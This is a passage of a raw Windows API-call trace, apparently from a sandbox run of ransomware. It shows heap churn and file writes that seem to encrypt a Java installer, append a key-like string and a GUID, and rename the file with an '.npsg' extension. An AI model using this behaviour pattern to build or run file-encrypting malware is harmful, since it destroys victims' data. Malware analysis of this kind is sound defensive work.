Flags=0x0, Size=0x4) returned 0x3373588 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0244.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0244.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0244.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0244.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89018 [0244.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0244.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89078 [0244.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89030 [0244.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0244.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89090 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89060 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89090 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fd0 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0244.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0244.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0244.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0244.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0244.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89078 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33cf9b8 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7998 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0244.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0244.572] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x25800, lpOverlapped=0x0) returned 1 [0244.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0244.620] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.620] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0244.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0244.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0244.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0244.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0244.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b8ccd0 [0244.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0244.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0244.621] WriteFile (in: hFile=0x644, lpBuffer=0x3b8ccd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b8ccd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0244.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.621] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0244.621] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0244.621] CloseHandle (hObject=0x644) returned 1 [0244.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0244.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b8ccd0 [0244.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0244.639] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.npsg")) returned 1 [0244.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0244.666] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0244.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0244.678] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0244.678] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0244.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0244.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0244.679] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0244.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0244.704] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0244.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.719] 